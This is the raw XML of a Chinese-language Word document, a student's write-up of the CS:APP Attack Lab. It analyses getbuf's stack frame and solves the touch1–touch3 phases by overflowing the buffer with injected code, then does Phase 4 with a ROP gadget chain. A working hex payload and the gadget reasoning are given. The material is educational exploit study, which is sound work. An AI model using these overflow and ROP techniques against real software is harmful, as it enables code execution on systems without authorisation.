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54.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId21.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId32.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId29.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId26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getbuf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">getbuf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分析代码得到栈帧布局</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">高地址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|---------------------|
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上一栈帧的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ebp       |  ← </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被覆盖风险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|---------------------|
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (retq)      |  ← </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被覆盖风险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|---------------------|
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| 40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节缓冲区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        |  ← Gets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数写入位置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|                     |
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|                     |
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|---------------------|  ← rsp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈顶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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">低地址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缓冲区溢出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数不检查输入长度，若输入超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，会覆盖返回地址，导致程序跳转到攻击者指定的位置执行任意代码。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返回地址位于缓冲区后8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节，因此需要构造：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">40 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节填充数据（覆盖缓冲区）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节目标地址（覆盖返回地址）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="24" w:name="touch1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">touch1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">00000000004017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">c0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touch1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">d3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	e8 e8 f4 ff ff       	callq  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cc0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puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">plt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打印成功信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就是只要执行这个函数即可通关，就是覆盖返回地址为touch1的地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1661885"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="22" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-11 17180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1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39" w:name="touch2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">touch2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fc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	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">c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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    	cmp    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x202ce2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">edi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比较 edi 和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x202ce2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rip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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">计算</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %rip = 0x4017fc + 6 = 0x401802 0x401802 + 0x202ce2 = 0x6044e4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就是要让edi和他相等</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="思路"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">断点打到getbuff，查rsp得到getbuf的开始位置，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然后修改代码给rdi赋值和跳转到touch2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">覆盖返回地址是getbuf的地址让他执行我修改的代码</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="38" w:name="过程和结果"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过程和结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2563208"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="27" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 160628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3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887826"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="30" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 145227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7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244741" cy="914400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="33" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-11 215640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593650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="36" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="D:\c%E7%9B%98%E7%A7%BB%E8%BF%87%E6%9D%A5%E7%9A%84\%E5%9B%BE%E7%89%87\Screenshots\%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-06-11%2021565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3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bookmarkStart w:id="50" w:name="touch3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">touch3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexmatch(cookie,sval)==1后才能进入validate(3)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而hexmatch函数的作用为将cookie转成字符串并和sval比较，如果相等则返回1，说明除了需进入touch3函数外，*sval必须等于cookie的字符串形式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">%rsi（函数第二个参数）为char*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sval，%edi为cookie，而877行将%rdi转入%rsi，说明初始状态下%rdi中存放着char*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sval，即%rdi需要修改</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所以需要在buffer中注入代码，而为了运行注入的代码，同Phase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一样需要跳转回栈顶地址0x5561dc78</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意到hexmatch函数中将%r12，%rbp，%rbx入栈，而这样会造成栈中原来输入的内容的覆盖，将数据放在getbuf的栈空间里面，很有可能就被这两个函数cover了。所以要把数据放到一个相对安全的栈空间里，选择放在父帧即test的栈空间里。gdb看一下test栈空间地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4851132" cy="2069431"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="41" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 16462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32" cy="2069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9" w:name="构造payload"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2174369"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="44" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 16475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4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根据ASCII</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 35 39 62 39 39 37 66 61 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">48 c7 c7 a8 dc 61 55 68
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fa 18 40 00 c3 00 00 00
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">78 dc 61 55 00 00 00 00
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">35 39 62 39 39 37 66 61
</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1880074"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="47" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 165153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0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End w:id="50"/>
    <w:bookmarkStart w:id="58" w:name="phase-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在ROP攻击中设置了栈随机化，所以我们不能像前面三个一样定位到精确地址插入代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将cookie放到%rdi，把touch2的地址放到栈中，以ret执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">猜测是需要一个mov命令来放参数，另外一个结合提示就是pop命令了，pop会把栈顶的cookie弹出到另外一个寄存器，再用mov命令写到%rdi里。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询farm可知pop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">%rax+ret可以用两种gadget表示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而pop的内容（0x59b997fa）应该放在pop+retq指令之后，此时pop指令会将pop后对应位置的元素pop进对应的寄存器中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而touch2函数地址（0x4017ec）应该放在movq+retq指令之后，当ret指令运行完毕后之后的地址会充当返回地址进入touch2函数</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="57" w:name="构造payload-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1875381"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="52" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/屏幕截图 2025-06-12 1715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5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395950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="fig:" id="55" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="https://cdn.jsdelivr.net/gh/liyu6688/images@main/18939737f542323f3a92b4bd52ed5d74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5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End w:id="5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54" Target="media/rId54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2025-06-12T09:21:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-12T09:21:48Z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